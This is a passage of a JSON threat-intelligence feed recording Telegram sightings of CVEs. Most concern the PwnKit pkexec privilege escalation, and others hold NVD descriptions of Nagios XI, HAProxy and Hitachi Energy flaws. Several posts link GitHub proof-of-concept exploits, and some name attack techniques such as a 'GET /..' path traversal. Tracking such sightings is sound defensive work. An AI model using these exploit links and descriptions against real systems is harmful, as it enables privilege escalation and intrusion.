\u0432\u043d\u0435 \u0433\u0440\u0430\u043d\u0438\u0446 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0432\u0432\u0435\u0441\u0442\u0438 \u00ab\u043d\u0435\u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u0443\u044e\u00bb \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e \u0432 \u0441\u0440\u0435\u0434\u0443 pkexec \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u043c \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u0443\u044e \u043e\u0431\u0449\u0443\u044e \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 \u0441 \u0440\u0443\u0442\u043e\u0432\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438. Qualys \u0442\u0430\u043a\u0443\u044e \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e \u043d\u0430\u0448\u043b\u0438.\n\n\u041e\u0448\u0438\u0431\u043a\u0430\u00a0\u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u043f\u0430\u043c\u044f\u0442\u0438 \u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442\u0441\u044f \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u043e, \u043d\u0430\u0434\u0435\u0436\u043d\u043e \u0438 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043e\u0442 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u044b. \u041e \u0431\u0430\u0433\u0435 \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u0432 \u043d\u043e\u044f\u0431\u0440\u0435 2021 \u0433\u043e\u0434\u0430, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043e 11 \u044f\u043d\u0432\u0430\u0440\u044f 2022 \u0433\u043e\u0434\u0430. \u0410 \u0441\u0435\u0439\u0447\u0430\u0441 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u0438 \u043a\u0430\u043a \u0437\u0430\u0432\u0435\u0440\u044f\u044e\u0442 \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0438 CERT/CC \u043e\u043d - \u00ab\u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u0438 \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0430\u043b\u044c\u043d\u044b\u0439\u00bb. \u041d\u0443 \u0438 \u0441\u0442\u043e\u0438\u0442 \u043f\u043e\u043c\u043d\u0438\u0442\u044c, \u0447\u0442\u043e polkit \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0438 \u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Solaris \u0438 BSD.\n\n\u041c\u044b \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0435\u043c\u0441\u044f \u043a Qualys \u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0436\u0443\u0440\u043d\u0430\u043b\u044b \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.", "creation_timestamp": "2022-01-26T15:30:16.000000Z"}, {"uuid": "3bbe521b-89da-45dc-9eca-e48401ba62db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/MoroccanGh0sts/181", "content": "A serious vulnerability affecting Linux operating systems has so far been tested on RedHat, Debian Distro's registered under CVE-2021-4034 that allows the user to execute orders for the authority of the system manager \"Root\" \nThe flaw in the exploitation of an error in the distribution of the powers of the PolicyKit system environment policy file \nThe image shows the local exploitation of the gap in the Debian system environment and how to avoid this gap by giving the right powers to the policy file.\n\n\ud83d\udc49 Mitigation Command:- \ud83c\uddf2\ud83c\udde6\u2728\n\u261e\ufe0e\ufe0e\ufe0e sudo chmod 0755 /usr/bin/pkexec \n\n\ud83d\udc49CVE-2021-4034 POC link:-\nhttps://github.com/OxWeb4/CVE-2021-4034-\n\n #Bl4ckS3curity_Team \ud83c\uddf2\ud83c\udde6 \ud83d\udc7f", "creation_timestamp": "2024-04-25T23:32:31.000000Z"}, {"uuid": "069c32fa-58ad-4163-af90-9406e37b7b86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/MoroccanGh0sts/170", "content": "PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit\u2019s pkexec (CVE-2021-4034) \u26a0", "creation_timestamp": "2022-02-04T19:04:17.000000Z"}, {"uuid": "66284b70-4a1c-4e8a-9905-915438e45463", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/MoroccanGh0sts/168", "content": "https://github.com/OxWeb4/CVE-2021-4034-", "creation_timestamp": "2022-04-24T06:41:52.000000Z"}, {"uuid": "9a458535-92b1-45b5-9d45-2afb47a0182e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40342", "type": "seen", "source": "https://t.me/cibsecurity/56017", "content": "\u203c CVE-2021-40342 \u203c\n\nIn the DES implementation, the affected product versions use a default key for encryption. Successful exploitation allows an attacker to obtain sensitive information and gain access to the network elements that are managed by the affected products versions. This issue affects * FOXMAN-UN product: FOXMAN-UN R16A, FOXMAN-UN R15B, FOXMAN-UN R15A, FOXMAN-UN R14B, FOXMAN-UN R14A, FOXMAN-UN R11B, FOXMAN-UN R11A, FOXMAN-UN R10C, FOXMAN-UN R9C; * UNEM product: UNEM R16A, UNEM R15B, UNEM R15A, UNEM R14B, UNEM R14A, UNEM R11B, UNEM R11A, UNEM R10C, UNEM R9C. List of CPEs: * cpe:2.3:a:hitachienergy:foxman-un:R16A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R15B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R15A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R14B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R14A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R11B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R11A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R10C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R9C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R16A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R15B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R15A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R14B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R14A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R11B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R11A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R10C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R9C:*:*:*:*:*:*:*\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-01-06T00:19:22.000000Z"}, {"uuid": "97edaf09-3586-44eb-ab6d-a07a5f7f9325", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/RalfHackerChannel/1161", "content": "CVE-2022-0185 Container Escape PoC: \n\nhttps://github.com/Crusaders-of-Rust/CVE-2022-0185\n\nCVE-2021-4034 Privilege Escalation polkit pkexec PoC:\n\nhttps://github.com/berdav/CVE-2021-4034\n\n#git #exploit", "creation_timestamp": "2022-05-31T08:02:18.000000Z"}, {"uuid": "31663519-db68-4b4a-b5dd-79f3ab3b514a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40340", "type": "seen", "source": "https://t.me/cibsecurity/36488", "content": "\u203c CVE-2021-40340 \u203c\n\nInformation Exposure vulnerability in Hitachi Energy LinkOne application, due to a misconfiguration in the ASP server exposes server and ASP.net information, an attacker that manages to exploit this vulnerability can use the exposed information as a reconnaissance for further exploitation. This issue affects: Hitachi Energy LinkOne 3.20; 3.22; 3.23; 3.24; 3.25; 3.26.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-01-28T22:22:12.000000Z"}, {"uuid": "5d0b26e6-cd59-4b6f-9893-ba6b759bd400", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40341", "type": "seen", "source": "https://t.me/cibsecurity/56023", "content": "\u203c CVE-2021-40341 \u203c\n\nDES cipher, which has inadequate encryption strength, is used Hitachi Energy FOXMAN-UN to encrypt user credentials used to access the Network Elements. Successful exploitation allows sensitive information to be decrypted easily. This issue affects * FOXMAN-UN product: FOXMAN-UN R16A, FOXMAN-UN R15B, FOXMAN-UN R15A, FOXMAN-UN R14B, FOXMAN-UN R14A, FOXMAN-UN R11B, FOXMAN-UN R11A, FOXMAN-UN R10C, FOXMAN-UN R9C; * UNEM product: UNEM R16A, UNEM R15B, UNEM R15A, UNEM R14B, UNEM R14A, UNEM R11B, UNEM R11A, UNEM R10C, UNEM R9C. List of CPEs: * cpe:2.3:a:hitachienergy:foxman-un:R16A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R15B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R15A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R14B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R14A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R11B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R11A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R10C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:foxman-un:R9C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R16A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R15B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R15A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R14B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R14A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R11B:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R11A:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R10C:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:unem:R9C:*:*:*:*:*:*:*\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-01-06T00:19:28.000000Z"}, {"uuid": "dcca2b79-007c-484e-a48e-6cf1b11a12ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40343", "type": "seen", "source": "https://t.me/cibsecurity/31202", "content": "\u203c CVE-2021-40343 \u203c\n\nAn issue was discovered in Nagios XI 5.8.5. Insecure file permissions on the nagios_unbundler.py file allow the nagios user to elevate their privileges to the root user.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-26T14:14:56.000000Z"}, {"uuid": "3bf016c0-c5a6-4b87-812e-232d280a639a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40344", "type": "seen", "source": "https://t.me/cibsecurity/31194", "content": "\u203c CVE-2021-40344 \u203c\n\nAn issue was discovered in Nagios XI 5.8.5. In the Custom Includes section of the Admin panel, an administrator can upload files with arbitrary extensions as long as the MIME type corresponds to an image. Therefore it is possible to upload a crafted PHP script to achieve remote command execution.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-26T14:14:46.000000Z"}, {"uuid": "9f739efa-b0c3-4391-bf38-ca7ba0182626", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40348", "type": "seen", "source": "https://t.me/cibsecurity/31530", "content": "\u203c CVE-2021-40348 \u203c\n\nSpacewalk 2.10, and derivatives such as Uyuni 2021.08, allows code injection. rhn-config-satellite.pl doesn't sanitize the configuration filename used to append Spacewalk-specific key-value pair. The script is intended to be run by the tomcat user account with Sudo, according to the installation setup. This can lead to the ability of an attacker to use --option to append arbitrary code to a root-owned file that eventually will be executed by the system. This is fixed in Uyuni spacewalk-admin 4.3.2-1.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-01T11:21:12.000000Z"}, {"uuid": "a4aa8481-8f88-48b0-886d-353ad06c46a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40345", "type": "seen", "source": "https://t.me/cibsecurity/31199", "content": "\u203c CVE-2021-40345 \u203c\n\nAn issue was discovered in Nagios XI 5.8.5. In the Manage Dashlets section of the Admin panel, an administrator can upload ZIP files. A command injection (within the name of the first file in the archive) allows an attacker to execute system commands.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-26T14:14:53.000000Z"}, {"uuid": "343f5dbf-85b0-4d3a-8cf4-d0ff8c93470c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40346", "type": "seen", "source": "https://t.me/cibsecurity/28505", "content": "\u203c CVE-2021-40346 \u203c\n\nAn integer overflow exists in HAProxy 2.0 through 2.5 in the htx_add_header() can be exploited to perform an HTTP request smuggling attack, allowing an attacker to bypass all configured http-request HAProxy ACLs and possibly other ACLs.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-09-08T20:45:33.000000Z"}, {"uuid": "3f50a226-4de0-4a2d-8c83-7f56028cdd8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40347", "type": "seen", "source": "https://t.me/cibsecurity/28696", "content": "\u203c CVE-2021-40347 \u203c\n\nAn issue was discovered in views/list.py in GNU Mailman Postorius before 1.3.5. An attacker (logged into any account) can send a crafted POST request to unsubscribe any user from a mailing list, also revealing whether that address was subscribed in the first place.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-09-10T22:30:51.000000Z"}, {"uuid": "2bb28385-c5b1-4bc3-a052-5af7b46b3d35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40349", "type": "seen", "source": "https://t.me/cibsecurity/29435", "content": "\u203c CVE-2021-40349 \u203c\n\ne7d Speed Test (aka speedtest) 0.5.3 allows a path-traversal attack that results in information disclosure via the \"GET /..\" substring.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-09-27T12:34:37.000000Z"}, {"uuid": "081adbf5-d071-4558-8533-c3f4b5ecce4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "exploited", "source": "https://t.me/information_security_channel/47854", "content": "CISA Says 'PwnKit' Linux Vulnerability Exploited in Attacks\nhttps://www.securityweek.com/cisa-says-pwnkit-linux-vulnerability-exploited-attacks\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) says a Linux vulnerability tracked as CVE-2021-4034 and PwnKit has been exploited in attacks.\nread more (https://www.securityweek.com/cisa-says-pwnkit-linux-vulnerability-exploited-attacks)", "creation_timestamp": "2022-06-28T20:08:30.000000Z"}, {"uuid": "f4bc5fdd-f825-4163-8eef-d686f065778c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1660", "content": "#exploit\nCVE-2021-4034:\npwnkit - LPE in polkit's pkexec\nhttps://github.com/berdav/CVE-2021-4034\nhttps://github.com/Ayrx/CVE-2021-4034\nhttps://github.com/arthepsy/CVE-2021-4034\n\n2. CVE-2022-0185:\nLinux Kernel Can Allow Container Escape in Kubernetes\nhttps://github.com/Crusaders-of-Rust/CVE-2022-0185\n\n@BlueRedTeam", "creation_timestamp": "2022-01-27T09:32:28.000000Z"}, {"uuid": "061e8f98-98f6-4df7-8e73-8ced807dba34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/thehackernews/1826", "content": "A 12-year-old vulnerability (CVE-2021-4034) has been discovered in the Polkit utility that could allow unprivileged attackers to gain root access to targeted Linux systems.\n\nDetails: https://thehackernews.com/2022/01/12-year-old-polkit-flaw-lets.html", "creation_timestamp": "2022-01-26T06:44:38.000000Z"}, {"uuid": "036d3c50-2c21-4651-a024-a3879c9092c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/xakep_ru/11866", "content": "PwnKit: \u0432 \u043a\u043e\u0434\u0435 Polkit \u043d\u0430\u0439\u0434\u0435\u043d \u0431\u0430\u0433 12-\u043b\u0435\u0442\u043d\u0435\u0439 \u0434\u0430\u0432\u043d\u043e\u0441\u0442\u0438, \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0449\u0438\u0439 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u043c Linux\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Qualys \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0431\u0430\u0433\u0435 12-\u043b\u0435\u0442\u043d\u0435\u0439 \u0434\u0430\u0432\u043d\u043e\u0441\u0442\u0438, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u043c \u0432 \u0441\u043e\u0441\u0442\u0430\u0432\u0435 pkexec Polkit. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2021-4034 \u0438 \u0438\u043c\u044f PwnKit, \u0438 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0441\u0443\u043f\u0435\u0440\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\n\nhttps://xakep.ru/2022/01/26/pwnkit/", "creation_timestamp": "2022-01-26T18:03:40.000000Z"}, {"uuid": "3672538b-a6a7-4f39-b801-b8b1f3abe797", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "exploited", "source": "https://t.me/SecLabNews/11502", "content": "\ud83d\udc2712-\u043b\u0435\u0442\u043d\u044f\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Linux \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u0441\u0443\u043f\u0435\u0440\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\n\n\u041f\u043b\u043e\u0445\u0438\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Linux \u2013 12-\u043b\u0435\u0442\u043d\u044f\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Polkit \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0441\u0443\u043f\u0435\u0440\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u0445 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043b\u044e\u0431\u043e\u0433\u043e \u043a\u0440\u0443\u043f\u043d\u043e\u0433\u043e \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430 Linux.\n\n\u041f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u043e\u0447\u0435\u043d\u044c \u043f\u0440\u043e\u0441\u0442\u043e, \u0438, \u043f\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043f\u043e\u0434\u0441\u0447\u0435\u0442\u0430\u043c, \u043e\u043d\u0430 \u043d\u0430 100% \u043d\u0430\u0434\u0435\u0436\u043d\u0430. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438, \u0443\u0436\u0435 \u0443\u043a\u0440\u0435\u043f\u0438\u0432\u0448\u0438\u0435\u0441\u044f \u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438\u043b\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441 \u043d\u0430\u0438\u0432\u044b\u0441\u0448\u0438\u043c\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 PwnKit ( CVE-2021-4034 ), \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u0441\u0430\u043c \u0434\u0435\u043c\u043e\u043d Polkit \u043d\u0435 \u0437\u0430\u043f\u0443\u0449\u0435\u043d.\n\n\u041d\u0430 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 Qualys \u043d\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0443\u0435\u0442 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0438\u0437 \u043e\u043f\u0430\u0441\u0435\u043d\u0438\u0439, \u0447\u0442\u043e \u0438\u043c \u043c\u043e\u0433\u0443\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438. \u041e\u0434\u043d\u0430\u043a\u043e, \u043f\u043e \u0438\u0445 \u043c\u043d\u0435\u043d\u0438\u044e, \u0430\u0442\u0430\u043a\u0438 \u0447\u0435\u0440\u0435\u0437 PwnKit \u2013 \u044d\u0442\u043e \u043b\u0438\u0448\u044c \u0432\u043e\u043f\u0440\u043e\u0441 \u0432\u0440\u0435\u043c\u0435\u043d\u0438.\n\nhttps://www.securitylab.ru/news/529181.php", "creation_timestamp": "2022-01-29T07:33:37.000000Z"}, {"uuid": "84ba1fce-3c76-44eb-a23f-5afde9d4e9b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "exploited", "source": "https://t.me/haccking/8145", "content": "CISA \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 Linux-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 PwnKit \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445\n\n\u0410\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u043e \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u0421\u0428\u0410 (CISA) \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c PwnKit \u0432 \u0441\u043f\u0438\u0441\u043e\u043a 